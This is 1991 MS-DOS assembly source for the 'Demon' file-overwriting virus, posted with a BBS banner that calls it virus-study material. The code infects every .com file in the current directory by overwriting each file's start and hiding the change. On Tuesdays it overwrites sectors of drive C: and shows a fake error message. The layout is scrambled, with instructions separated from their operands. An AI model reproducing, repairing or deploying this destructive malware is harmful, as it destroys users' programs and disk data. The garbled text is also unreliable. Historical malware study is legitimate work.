;========== demon virus ==================================== 22.09.91 ======== ; ; assemble and link with: tasm demon.vir ; tlink demon /x/t ; infect all .com programs in current directory with: demon ; ; !!! not on a tuesday !!! ; ;-------------- constants and structures tuesday
=
2
; int 21h, ah=2ah
search_rec
struc db db dw dw dd db ends
21 dup (?) ? ? ? ? 13 dup (?)
; directory search record ; reserved for dos ; file attribute ; packed file time ; packed file date ; long file size ; asciiz filename.ext
fileattr filetime filedate filesize filename search_rec
;-------------- demon virus segment virus
dta demon: virus_size
infect:
next_file: check_day:
thrash_drive: write_sectors:
segment assume cs:virus,ds:virus,es:virus,ss:virus org 0080h search_rec <>
; disk transfer area
org
0100h
=
virus_end - demon
mov mov mov int nop jnc jmp call mov mov int nop jnc jmp jmp mov int cmp je mov int
dx,offset all_com ah,4eh cx,110bh 21h
; find first .com file, ; including hidden/system
infect short check_day replicate dx,offset dta ah,4fh 21h
; abort if no files found
mov jmp mov
counter,0 write_sectors al,drive_c
next_file short check_day infect ah,2ah 21h al,tuesday thrash_drive ah,4ch 21h
; virus entry point ; virus size = 272 bytes
; overwrite first 272 bytes ; find next .com file, ; go check day if none found ; else repeat
; get dos date, check day ; tuesday ? ; if yes, thrash drive c: ; else exit to dos ; overwrite first 160 sectors ; of drive c: with garbage ; error: doesn't work !
show_msg:
replicate:
all_com com_date com_time com_attr counter drive_c
mov mov mov int inc cmp je jne mov mov int mov int
cx,160 dx,0 bx,0 26h counter counter,10 show_msg write_sectors ah,09h dx,offset virus_msg 21h ah,4ch 21h
; ; ; ;
mov mov int mov nop xor mov int nop mov int nop jc mov mov int nop mov mov mov mov mov int nop mov mov mov int mov int nop mov mov mov int retn
dx,offset dta.filename ax,4300h 21h com_attr,cx
; save file attribute
cx,cx ax,4301h 21h
; unprotect the .com file ; in case it's read-only
ax,3d02h 21h
; open .com file for r/w, ; abort on error
db dw dw dw db db dw
check_day bx,ax ax,5700h 21h com_time,cx com_date,dx dx,offset demon ah,40h cx,virus_size 21h
al=c:, cx=160 sectors dx=highest sector in drive ! ds:bx=start of psp area overwrite sectors
; repeat 10 times ; show a fake error message ; and exit to dos
; bx = file handle ; save file date and time
; overwrite first 272 bytes ; of .com program file ; with the virus code
ax,5701h dx,com_date cx,com_time 21h ah,3eh 21h
; restore file date and time
dx,offset dta.filename cx,com_attr ax,4301h 21h
; restore file attribute
'*.com',0 0 0 0 0 2 0
; ; ; ; ; ;
; close the file
dir search specification packed .com program date packed .com program time .com program file attribute used when thrashing drive c: int 26h c: drive number
copyright virus_msg
db dw db
'demonhyak viri x.x (c) by cracker jack 1991 (ivrl)' 0 10,13,'error eating drive c:',10,13,'$'
virus_end
label
byte
virus
ends end
demon
; virus code+data end
;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=; ; -=] p e r f e c t c r i m e [=; ; -=] +31.(o)79.426o79 [=; ; -=] [=; ; -=] for all your h/p/a/v files [=; ; -=] sysop: peter venkman [=; ; -=] [=; ; -=] +31.(o)79.426o79 [=; ; -=] p e r f e c t c r i m e [=; ; -=][][][][][][][][][][][][][][][=; ; ; ; *** not for general distribution *** ; ; ; ; this file is for the purpose of virus study only! it should not be passed ; ; around among the general public. it will be very useful for learning how ; ; viruses work and propagate. but anybody with access to an assembler can ; ; turn it into a working virus and anybody with a bit of assembly coding ; ; experience can turn it into a far more malevolent program than it already ; ; is. keep this code in responsible hands! ; ; ; ;****************************************************************************;